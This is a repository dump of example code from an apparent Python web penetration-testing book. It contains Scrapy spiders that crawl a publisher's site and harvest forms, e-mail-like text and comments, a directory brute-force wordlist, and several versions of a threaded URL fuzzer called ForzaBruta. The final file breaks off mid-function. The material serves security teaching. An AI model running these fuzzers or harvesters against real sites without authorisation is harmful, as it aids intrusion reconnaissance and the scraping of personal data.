57 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
58 | #EXTENSIONS = {
59 | # 'scrapy.telnet.TelnetConsole': None,
60 | #}
61 |
62 | # Configure item pipelines
63 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
64 | #ITEM_PIPELINES = {
65 | # 'basic_crawler.pipelines.SomePipeline': 300,
66 | #}
67 |
68 | # Enable and configure the AutoThrottle extension (disabled by default)
69 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html
70 | # NOTE: AutoThrottle will honour the standard settings for concurrency and delay
71 | #AUTOTHROTTLE_ENABLED=True
72 | # The initial download delay
73 | #AUTOTHROTTLE_START_DELAY=5
74 | # The maximum download delay to be set in case of high latencies
75 | #AUTOTHROTTLE_MAX_DELAY=60
76 | # Enable showing throttling stats for every response received:
77 | #AUTOTHROTTLE_DEBUG=False
78 |
79 | # Enable and configure HTTP caching (disabled by default)
80 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
81 | #HTTPCACHE_ENABLED=True
82 | #HTTPCACHE_EXPIRATION_SECS=0
83 | #HTTPCACHE_DIR='httpcache'
84 | #HTTPCACHE_IGNORE_HTTP_CODES=[]
85 | #HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
86 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/settings.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/__init__.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-base.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 |
6 |
class MySpider(BaseSpider):
    """Minimal spider: collects book titles from the Packt homepage."""

    name = "basic_crawler"
    allowed_domains = ['packtpub.com']
    start_urls = ["https://www.packtpub.com"]

    def parse(self, response):
        """Yield one BasicCrawlerItem per book title found on the page."""
        selector = Selector(response)

        # Each book block exposes its title as the text of this div.
        for raw_title in selector.xpath('//div[@class="book-block-title"]/text()').extract():
            item = BasicCrawlerItem()
            item["title"] = raw_title
            yield item
21 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-base.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/spiderman-base.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-c.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
class MySpider(BaseSpider):
    """Crawler that scrapes form targets, e-mail-looking text and HTML
    comments from every page it visits, following links recursively."""

    name = "basic_crawler"
    allowed_domains = ['packtpub.com']
    start_urls = ["https://www.packtpub.com"]

    # Matches absolute http/https URLs; relative links fail this test and
    # are resolved against the current response URL instead.  Raw string
    # keeps the pattern byte-identical while making the escapes explicit.
    link_validator = re.compile(r"^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")

    # Class-level so the visited set survives across parse() calls.
    visited_links = []

    def parse(self, response):
        """Scrape forms, e-mails and comments from one response, then crawl on."""
        hxs = Selector(response)

        # Scrape form action targets.
        forms = hxs.xpath('//form/@action').extract()
        for form in forms:
            formy = BasicCrawlerItem()
            formy["form"] = form
            formy["location_url"] = response.url
            yield formy

        # Scrape anything whose text contains '@' (crude e-mail detector).
        emails = hxs.xpath("//*[contains(text(),'@')]").extract()
        for email in emails:
            com = BasicCrawlerItem()
            com["email"] = email
            com["location_url"] = response.url
            yield com

        # Scrape HTML comments.
        comments = hxs.xpath('//comment()').extract()
        for comment in comments:
            com = BasicCrawlerItem()
            com["comments"] = comment
            com["location_url"] = response.url
            yield com

        # Follow every link exactly once, absolute or relative.
        for link in hxs.xpath('//a/@href').extract():
            if self.link_validator.match(link):
                full_url = link
            else:
                # Relative link: resolve it against the page we are on.
                full_url = response.urljoin(link)
            # BUG FIX: the original only de-duplicated absolute links; the
            # else branch re-queued relative links even when already visited.
            if full_url not in self.visited_links:
                self.visited_links.append(full_url)
                yield Request(full_url, self.parse)
62 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-recursive.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
class MySpider(BaseSpider):
    """Recursive crawler: scrapes book titles and follows links site-wide."""

    name = "basic_crawler"
    allowed_domains = ['packtpub.com']
    start_urls = ["https://www.packtpub.com"]

    # Matches absolute http/https URLs (raw string, pattern unchanged).
    link_validator = re.compile(r"^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")

    # Class-level so the visited set survives across parse() calls.
    visited_links = []

    def parse(self, response):
        """Yield one item per book title, then follow every link once."""
        hxs = Selector(response)

        for title in hxs.xpath('//div[@class="book-block-title"]/text()').extract():
            book = BasicCrawlerItem()
            book["title"] = title
            yield book

        for link in hxs.xpath('//a/@href').extract():
            # Absolute links pass the validator; everything else is resolved
            # relative to the current page.
            if self.link_validator.match(link):
                full_url = link
            else:
                full_url = response.urljoin(link)
            # BUG FIX: the original else branch re-queued relative links
            # without consulting visited_links.
            if full_url not in self.visited_links:
                self.visited_links.append(full_url)
                yield Request(full_url, self.parse)
38 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman-recursive.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/spiderman-recursive.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
class MySpider(BaseSpider):
    """Recursive crawler: scrapes book titles and follows links site-wide."""

    name = "basic_crawler"
    allowed_domains = ['packtpub.com']
    start_urls = ["https://www.packtpub.com"]

    # Matches absolute http/https URLs (raw string, pattern unchanged).
    link_validator = re.compile(r"^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")

    # Class-level so the visited set survives across parse() calls.
    visited_links = []

    def parse(self, response):
        """Yield one item per book title, then follow every link once."""
        hxs = Selector(response)

        for title in hxs.xpath('//div[@class="book-block-title"]/text()').extract():
            book = BasicCrawlerItem()
            book["title"] = title
            yield book

        for link in hxs.xpath('//a/@href').extract():
            # Absolute links pass the validator; everything else is resolved
            # relative to the current page.
            if self.link_validator.match(link):
                full_url = link
            else:
                full_url = response.urljoin(link)
            # BUG FIX: the original else branch re-queued relative links
            # without consulting visited_links.
            if full_url not in self.visited_links:
                self.visited_links.append(full_url)
                yield Request(full_url, self.parse)
38 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/spiders/spiderman.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/spiders/spiderman.pyc
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/common.txt:
--------------------------------------------------------------------------------
1 | wfuzz
2 | test
3 | robots.txt
4 | about.php
5 | redir.php
6 | test1.txt
7 | test2.txt
8 | admin
9 | Admin
10 | index.php
11 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/commons.txt:
--------------------------------------------------------------------------------
1 | e
2 | 00
3 | 01
4 | 02
5 | 03
6 | 1
7 | 10
8 | 100
9 | 1000
10 | 123
11 | 2
12 | 20
13 | 200
14 | 2000
15 | 2001
16 | 2002
17 | 2003
18 | 2004
19 | 2005
20 | 3
21 | @
22 | Admin
23 | Administration
24 | crm
25 | CVS
26 | CYBERDOCS
27 | CYBERDOCS25
28 | CYBERDOCS31
29 | INSTALL_admin
30 | Log
31 | Logs
32 | Pages
33 | Servlet
34 | Servlets
35 | SiteServer
36 | Sources
37 | Statistics
38 | Stats
39 | W3SVC
40 | W3SVC1
41 | W3SVC2
42 | W3SVC3
43 | WEB-INF
44 | _admin
45 | _pages
46 | a
47 | aa
48 | aaa
49 | abc
50 | about
51 | academic
52 | access
53 | accessgranted
54 | account
55 | accounting
56 | action
57 | actions
58 | active
59 | adm
60 | admin
61 | admin_
62 | admin_login
63 | admin_logon
64 | administrat
65 | administration
66 | administrator
67 | adminlogin
68 | adminlogon
69 | adminsql
70 | admon
71 | adsl
72 | agent
73 | agents
74 | alias
75 | aliases
76 | all
77 | alpha
78 | analog
79 | analyse
80 | announcements
81 | answer
82 | any
83 | apache
84 | api
85 | app
86 | applet
87 | applets
88 | appliance
89 | application
90 | applications
91 | apply
92 | apps
93 | archive
94 | archives
95 | arrow
96 | asp
97 | aspadmin
98 | assets
99 | attach
100 | attachments
101 | audit
102 | auth
103 | auto
104 | automatic
105 | b
106 | back
107 | back-up
108 | backdoor
109 | backend
110 | backoffice
111 | backup
112 | backups
113 | bak
114 | bak-up
115 | bakup
116 | bank
117 | banks
118 | banner
119 | banners
120 | base
121 | basic
122 | bass
123 | batch
124 | bd
125 | bdata
126 | bea
127 | bean
128 | beans
129 | beta
130 | bill
131 | billing
132 | bin
133 | binaries
134 | biz
135 | blog
136 | blow
137 | board
138 | boards
139 | body
140 | boot
141 | bot
142 | bots
143 | box
144 | boxes
145 | broken
146 | bsd
147 | bug
148 | bugs
149 | build
150 | builder
151 | bulk
152 | business
153 | buttons
154 | c
155 | cache
156 | cachemgr
157 | cad
158 | can
159 | captcha
160 | car
161 | card
162 | cardinal
163 | cards
164 | carpet
165 | cart
166 | cas
167 | cat
168 | catalog
169 | catalogs
170 | catch
171 | cc
172 | ccs
173 | cd
174 | cdrom
175 | cert
176 | certenroll
177 | certificate
178 | certificates
179 | certs
180 | cfdocs
181 | cfg
182 | cgi
183 | cgi-bin
184 | cgi-win
185 | cgibin
186 | chan
187 | change
188 | changepw
189 | channel
190 | chart
191 | chat
192 | class
193 | classes
194 | classic
195 | classified
196 | classifieds
197 | client
198 | clients
199 | cluster
200 | cm
201 | cmd
202 | code
203 | coffee
204 | coke
205 | command
206 | commerce
207 | commercial
208 | common
209 | component
210 | compose
211 | composer
212 | compressed
213 | comunicator
214 | con
215 | config
216 | configs
217 | configuration
218 | configure
219 | connect
220 | connections
221 | console
222 | constant
223 | constants
224 | contact
225 | contacts
226 | content
227 | contents
228 | control
229 | controller
230 | controlpanel
231 | controls
232 | corba
233 | core
234 | corporate
235 | count
236 | counter
237 | cpanel
238 | create
239 | creation
240 | credit
241 | creditcards
242 | cron
243 | crs
244 | css
245 | customer
246 | customers
247 | customize
248 | cv
249 | cvs
250 | d
251 | daemon
252 | dat
253 | data
254 | database
255 | databases
256 | dav
257 | db
258 | dba
259 | dbase
260 | dbm
261 | dbms
262 | debug
263 | default
264 | delete
265 | deletion
266 | demo
267 | demos
268 | deny
269 | deploy
270 | deployment
271 | design
272 | details
273 | dev
274 | dev60cgi
275 | devel
276 | develop
277 | developement
278 | developers
279 | development
280 | device
281 | devices
282 | devs
283 | diag
284 | dial
285 | dig
286 | dir
287 | directory
288 | discovery
289 | disk
290 | dispatch
291 | dispatcher
292 | dms
293 | dns
294 | doc
295 | docs
296 | docs41
297 | docs51
298 | document
299 | documents
300 | down
301 | download
302 | downloads
303 | draft
304 | dragon
305 | dratfs
306 | driver
307 | dump
308 | dumpenv
309 | e
310 | easy
311 | ebriefs
312 | echannel
313 | ecommerce
314 | edit
315 | editor
316 | element
317 | elements
318 | email
319 | employee
320 | employees
321 | en
322 | eng
323 | engine
324 | english
325 | enterprise
326 | env
327 | environ
328 | environment
329 | error
330 | errors
331 | es
332 | esales
333 | esp
334 | established
335 | esupport
336 | etc
337 | event
338 | events
339 | example
340 | examples
341 | exchange
342 | exe
343 | exec
344 | executable
345 | executables
346 | explorer
347 | export
348 | external
349 | extra
350 | Extranet
351 | extranet
352 | fail
353 | failed
354 | fcgi-bin
355 | feedback
356 | field
357 | file
358 | files
359 | filter
360 | firewall
361 | first
362 | flash
363 | folder
364 | foo
365 | forget
366 | forgot
367 | forgotten
368 | form
369 | format
370 | formhandler
371 | formsend
372 | formupdate
373 | fortune
374 | forum
375 | forums
376 | frame
377 | framework
378 | ftp
379 | fun
380 | function
381 | functions
382 | games
383 | gate
384 | generic
385 | gest
386 | get
387 | global
388 | globalnav
389 | globals
390 | gone
391 | gp
392 | gpapp
393 | granted
394 | graphics
395 | group
396 | groups
397 | guest
398 | guestbook
399 | guests
400 | hack
401 | hacker
402 | handler
403 | hanlder
404 | happening
405 | head
406 | header
407 | headers
408 | hello
409 | helloworld
410 | help
411 | hidden
412 | hide
413 | history
414 | hits
415 | home
416 | homepage
417 | homes
418 | homework
419 | host
420 | hosts
421 | htdocs
422 | htm
423 | html
424 | htmls
425 | ibm
426 | icons
427 | idbc
428 | iis
429 | images
430 | img
431 | import
432 | inbox
433 | inc
434 | include
435 | includes
436 | incoming
437 | incs
438 | index
439 | index2
440 | index_adm
441 | index_admin
442 | indexes
443 | info
444 | information
445 | ingres
446 | ingress
447 | ini
448 | init
449 | input
450 | install
451 | installation
452 | interactive
453 | internal
454 | internet
455 | intranet
456 | intro
457 | inventory
458 | invitation
459 | invite
460 | ipp
461 | ips
462 | j
463 | java
464 | java-sys
465 | javascript
466 | jdbc
467 | job
468 | join
469 | jrun
470 | js
471 | jsp
472 | jsps
473 | jsr
474 | keep
475 | kept
476 | kernel
477 | key
478 | lab
479 | labs
480 | launch
481 | launchpage
482 | ldap
483 | left
484 | level
485 | lib
486 | libraries
487 | library
488 | libs
489 | link
490 | links
491 | linux
492 | list
493 | load
494 | loader
495 | lock
496 | lockout
497 | log
498 | logfile
499 | logfiles
500 | logger
501 | logging
502 | login
503 | logo
504 | logon
505 | logout
506 | logs
507 | lost%2Bfound
508 | ls
509 | magic
510 | mail
511 | mailbox
512 | maillist
513 | main
514 | maint
515 | makefile
516 | man
517 | manage
518 | management
519 | manager
520 | manual
521 | map
522 | market
523 | marketing
524 | master
525 | mbo
526 | mdb
527 | me
528 | member
529 | members
530 | memory
531 | menu
532 | message
533 | messages
534 | messaging
535 | meta
536 | metabase
537 | mgr
538 | mine
539 | minimum
540 | mirror
541 | mirrors
542 | misc
543 | mkstats
544 | model
545 | modem
546 | module
547 | modules
548 | monitor
549 | mount
550 | mp3
551 | mp3s
552 | mqseries
553 | mrtg
554 | ms
555 | ms-sql
556 | msql
557 | mssql
558 | music
559 | my
560 | my-sql
561 | mysql
562 | names
563 | navigation
564 | ne
565 | net
566 | netscape
567 | netstat
568 | network
569 | new
570 | news
571 | next
572 | nl
573 | nobody
574 | notes
575 | novell
576 | nul
577 | null
578 | number
579 | object
580 | objects
581 | odbc
582 | of
583 | off
584 | office
585 | ogl
586 | old
587 | oldie
588 | on
589 | online
590 | open
591 | openapp
592 | openfile
593 | operator
594 | oracle
595 | oradata
596 | order
597 | orders
598 | outgoing
599 | output
600 | pad
601 | page
602 | pages
603 | pam
604 | panel
605 | paper
606 | papers
607 | pass
608 | passes
609 | passw
610 | passwd
611 | passwor
612 | password
613 | passwords
614 | path
615 | pdf
616 | perl
617 | perl5
618 | personal
619 | personals
620 | pgsql
621 | phone
622 | php
623 | phpMyAdmin
624 | phpmyadmin
625 | pics
626 | ping
627 | pix
628 | pl
629 | pls
630 | plx
631 | pol
632 | policy
633 | poll
634 | pop
635 | portal
636 | portlet
637 | portlets
638 | post
639 | postgres
640 | power
641 | press
642 | preview
643 | print
644 | printenv
645 | priv
646 | private
647 | privs
648 | process
649 | processform
650 | prod
651 | production
652 | products
653 | professor
654 | profile
655 | program
656 | project
657 | proof
658 | properties
659 | protect
660 | protected
661 | proxy
662 | ps
663 | pub
664 | public
665 | publish
666 | publisher
667 | purchase
668 | purchases
669 | put
670 | pw
671 | pwd
672 | python
673 | query
674 | queries
675 | queue
676 | quote
677 | ramon
678 | random
679 | rank
680 | rcs
681 | readme
682 | redir
683 | redirect
684 | reference
685 | references
686 | reg
687 | reginternal
688 | regional
689 | register
690 | registered
691 | release
692 | remind
693 | reminder
694 | remote
695 | removed
696 | report
697 | reports
698 | requisite
699 | research
700 | reseller
701 | resource
702 | resources
703 | responder
704 | restricted
705 | retail
706 | right
707 | robot
708 | robots.txt
709 | robotics
710 | root
711 | route
712 | router
713 | rpc
714 | rss
715 | rules
716 | run
717 | sales
718 | sample
719 | samples
720 | save
721 | saved
722 | schema
723 | scr
724 | scratc
725 | script
726 | scripts
727 | sdk
728 | search
729 | secret
730 | secrets
731 | section
732 | sections
733 | secure
734 | secured
735 | security
736 | select
737 | sell
738 | send
739 | sendmail
740 | sensepost
741 | sensor
742 | sent
743 | server
744 | server_stats
745 | servers
746 | service
747 | services
748 | servlet
749 | servlets
750 | session
751 | sessions
752 | set
753 | setting
754 | settings
755 | setup
756 | share
757 | shared
758 | shell
759 | shit
760 | shop
761 | shopper
762 | show
763 | showcode
764 | shtml
765 | sign
766 | signature
767 | signin
768 | simple
769 | single
770 | site
771 | sites
772 | sitemap
773 | sites
774 | small
775 | snoop
776 | soap
777 | soapdocs
778 | software
779 | solaris
780 | solutions
781 | somebody
782 | source
783 | sources
784 | spain
785 | spanish
786 | sql
787 | sqladmin
788 | src
789 | srchad
790 | srv
791 | ssi
792 | ssl
793 | staff
794 | start
795 | startpage
796 | stat
797 | statistic
798 | statistics
799 | stats
800 | status
801 | stop
802 | store
803 | story
804 | string
805 | student
806 | stuff
807 | style
808 | stylesheet
809 | stylesheets
810 | submit
811 | submitter
812 | sun
813 | super
814 | support
815 | supported
816 | survey
817 | svc
818 | svn
819 | svr
820 | sw
821 | sys
822 | sysadmin
823 | system
824 | table
825 | tag
826 | tape
827 | tar
828 | target
829 | tech
830 | temp
831 | template
832 | templates
833 | temporal
834 | temps
835 | terminal
836 | test
837 | testing
838 | tests
839 | text
840 | texts
841 | ticket
842 | tmp
843 | today
844 | tool
845 | toolbar
846 | tools
847 | top
848 | topics
849 | tour
850 | tpv
851 | trace
852 | traffic
853 | transaction
854 | transactions
855 | transfer
856 | transport
857 | trap
858 | trash
859 | tree
860 | trees
861 | tutorial
862 | uddi
863 | uninstall
864 | unix
865 | up
866 | update
867 | updates
868 | upload
869 | uploader
870 | uploads
871 | usage
872 | user
873 | users
874 | usr
875 | ustats
876 | util
877 | utilities
878 | utility
879 | utils
880 | validation
881 | validatior
882 | vap
883 | var
884 | vb
885 | vbs
886 | vbscript
887 | vbscripts
888 | vfs
889 | view
890 | viewer
891 | views
892 | virtual
893 | visitor
894 | vpn
895 | w
896 | w3
897 | w3c
898 | warez
899 | wdav
900 | web
901 | webaccess
902 | webadmin
903 | webapp
904 | webboard
905 | webcart
906 | webdata
907 | webdav
908 | webdist
909 | webhits
910 | weblog
911 | weblogic
912 | weblogs
913 | webmail
914 | webmaster
915 | webservice
916 | webservices
917 | websearch
918 | website
919 | webstat
920 | webstats
921 | webvpn
922 | welcome
923 | wellcome
924 | whatever
925 | whatnot
926 | whois
927 | wiki
928 | will
929 | win
930 | windows
931 | word
932 | work
933 | workplace
934 | workshop
935 | ws
936 | wstats
937 | wusage
938 | www
939 | wwwboard
940 | wwwjoin
941 | wwwlog
942 | wwwstats
943 | xcache
944 | xfer
945 | xml
946 | xmlrpc
947 | xsl
948 | xsql
949 | xyz
950 | zap
951 | zip
952 | zipfiles
953 | zips
954 | test1.txt
955 | test2.txt
956 | redir.php
957 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-2.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | from termcolor import colored
8 |
9 |
10 |
11 | def banner():
12 | print "\n***************************************"
13 | print "* ForzaBruta 0.2*"
14 | print "***************************************"
15 |
16 |
17 | def usage():
18 | print "Usage:"
19 | print " -w: url (http://somesite.com/FUZZ)"
20 | print " -t: threads"
21 | print " -f: dictionary file"
22 | print " -c: filter by status code"
23 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
24 |
25 |
26 | class request_performer(Thread):
27 | def __init__(self, word, url,hidecode):
28 | Thread.__init__(self)
29 | try:
30 | self.word = word.split("\n")[0]
31 | self.urly = url.replace('FUZZ', self.word)
32 | self.url = self.urly
33 | self.hidecode = hidecode
34 | except Exception, e:
35 | print e
36 |
37 | def run(self):
38 | try:
39 | r = requests.get(self.url)
40 | lines = str(r.content.count("\n"))
41 | chars = str(len(r._content))
42 | words = str(len(re.findall("\S+", r.content)))
43 | code = str(r.status_code)
44 | if self.hidecode != code:
45 | if '200' <= code < '300':
46 | print colored(code,'green') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
47 | elif '400' <= code < '500':
48 | print colored(code,'red') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
49 | elif '300' <= code < '400':
50 | print colored(code,'blue') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
51 | else:
52 | print colored(code,'yellow') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + self.url + "\t\t "
53 |
54 | else:
55 | pass
56 | i[0] = i[0] - 1 # Here we remove one thread from the counter
57 | except Exception, e:
58 | print e
59 |
60 |
61 | def start(argv):
62 | banner()
63 | if len(sys.argv) < 5:
64 | usage()
65 | sys.exit()
66 | try:
67 | opts, args = getopt.getopt(argv, "w:f:t:c:")
68 | except getopt.GetoptError:
69 | print "Error en arguments"
70 | sys.exit()
71 | hidecode = 000
72 | for opt, arg in opts:
73 | if opt == '-w':
74 | url = arg
75 | elif opt == '-f':
76 | dict = arg
77 | elif opt == '-t':
78 | threads = arg
79 | elif opt == '-c':
80 | hidecode = arg
81 | try:
82 | f = open(dict, "r")
83 | words = f.readlines()
84 | except:
85 | print"Failed opening file: " + dict + "\n"
86 | sys.exit()
87 | launcher_thread(words, threads, url,hidecode)
88 |
89 |
90 | def launcher_thread(names, th, url,hidecode):
91 | global i
92 | i = []
93 | i.append(0)
94 | print "-------------------------------------------------------------------------------------------------------------"
95 | print "Code" + "\t\tchars\t\twords\t\tlines\t\tURL"
96 | print "-------------------------------------------------------------------------------------------------------------"
97 | while len(names):
98 | try:
99 | if i[0] < th:
100 | n = names.pop(0)
101 | i[0] = i[0] + 1
102 | thread = request_performer(n, url,hidecode)
103 | thread.start()
104 |
105 | except KeyboardInterrupt:
106 | print "ForzaBruta interrupted by user. Finishing attack.."
107 | sys.exit()
108 | thread.join()
109 | return
110 |
111 |
# Script entry point: forward everything after the program name to start().
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler for interrupts outside the launcher loop.
        print "ForzaBruta interrupted by user, killing all threads..!!"
117 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-3.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 |
8 | import md5
9 | from termcolor import colored
10 |
11 |
12 | def banner():
13 | print "\n***************************************"
14 | print "* ForzaBruta 0.3*"
15 | print "***************************************"
16 |
17 |
18 | def usage():
19 | print "Usage:"
20 | print " -w: url (http://somesite.com/FUZZ)"
21 | print " -t: threads"
22 | print " -f: dictionary file\n"
23 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
24 |
25 |
26 | class request_performer(Thread):
27 | def __init__(self, word, url,hidecode):
28 | Thread.__init__(self)
29 | try:
30 | self.word = word.split("\n")[0]
31 | self.urly = url.replace('FUZZ', self.word)
32 | self.url = self.urly
33 | self.hidecode = hidecode
34 | except Exception, e:
35 | print e
36 |
37 | def run(self):
38 | try:
39 | start = time.time()
40 | r = requests.get(self.url)
41 | elaptime = time.time()
42 | totaltime = str(elaptime - start)
43 | lines = str(r.content.count("\n"))
44 | chars = str(len(r._content))
45 | words = str(len(re.findall("\S+", r.content)))
46 | code = str(r.status_code)
47 | hash = md5.new(r.content).hexdigest()
48 |
49 | if r.history != []:
50 | first = r.history[0]
51 | code = str(first.status_code)
52 | else:
53 | pass
54 | if self.hidecode != code:
55 | if '200' <= code < '300':
56 | print totaltime + " \t" + colored(code,'green') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t"+ self.word
57 | elif '400' <= code < '500':
58 | print totaltime + " \t" + colored(code,'red') + "\t" + chars + " \t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
59 | elif '300' <= code < '400':
60 | print totaltime + " \t" + colored(code,'blue') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
61 | else:
62 | pass
63 | i[0] = i[0] - 1 # Here we remove one thread from the counter
64 | except Exception, e:
65 | print e
66 |
67 |
68 | def start(argv):
69 | banner()
70 | if len(sys.argv) < 5:
71 | usage()
72 | sys.exit()
73 | try:
74 | opts, args = getopt.getopt(argv, "w:f:t:c:")
75 | except getopt.GetoptError:
76 | print "Error en arguments"
77 | sys.exit()
78 | hidecode = 000
79 | for opt, arg in opts:
80 | if opt == '-w':
81 | url = arg
82 | elif opt == '-f':
83 | dict = arg
84 | elif opt == '-t':
85 | threads = arg
86 | elif opt == '-c':
87 | hidecode = arg
88 | try:
89 | f = open(dict, "r")
90 | words = f.readlines()
91 | except:
92 | print"Failed opening file: " + dict + "\n"
93 | sys.exit()
94 | launcher_thread(words, threads, url, hidecode)
95 |
96 |
97 | def launcher_thread(names, th, url, hidecode):
98 | global i
99 | i = []
100 | resultlist = []
101 | i.append(0)
102 | print "-------------------------------------------------------------------------------------------------------------"
103 | print "Time" + "\t\t\t" + "Code" + "\tChars \t Words \tLines \t MD5 \t\t\t\t\t String"
104 | print "-------------------------------------------------------------------------------------------------------------"
105 | while len(names):
106 | try:
107 | if i[0] < th:
108 | n = names.pop(0)
109 | i[0] = i[0] + 1
110 | thread = request_performer(n, url,hidecode)
111 | thread.start()
112 |
113 | except KeyboardInterrupt:
114 | print "ForzaBruta interrupted by user. Finishing attack.."
115 | sys.exit()
116 | thread.join()
117 | return
118 |
119 |
# Script entry point: forward everything after the program name to start().
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler for interrupts outside the launcher loop.
        print "ForzaBruta interrupted by user, killing all threads..!!"
125 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-4.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | import md5
8 | from termcolor import colored
9 |
10 | from selenium import webdriver
11 | from selenium.webdriver.common.keys import Keys
12 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
13 |
14 |
15 | def banner():
16 | print "\n***************************************"
17 | print "* ForzaBruta 0.3*"
18 | print "***************************************"
19 |
20 |
21 | def usage():
22 | print "Usage:"
23 | print " -w: url (http://somesite.com/FUZZ)"
24 | print " -t: threads"
25 | print " -f: dictionary file\n"
26 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
27 |
28 |
29 | class request_performer(Thread):
30 | def __init__(self, word, url,hidecode):
31 | Thread.__init__(self)
32 | try:
33 | self.word = word.split("\n")[0]
34 | self.urly = url.replace('FUZZ', self.word)
35 | self.url = self.urly
36 | self.hidecode = hidecode
37 | except Exception, e:
38 | print e
39 |
40 | def run(self):
41 | try:
42 | start = time.time()
43 | r = requests.get(self.url)
44 | elaptime = time.time()
45 | totaltime = str(elaptime - start)
46 | lines = str(r.content.count("\n"))
47 | chars = str(len(r._content))
48 | words = str(len(re.findall("\S+", r.content)))
49 | code = str(r.status_code)
50 | hash = md5.new(r.content).hexdigest()
51 |
52 | if r.history != []:
53 | first = r.history[0]
54 | code = str(first.status_code)
55 | else:
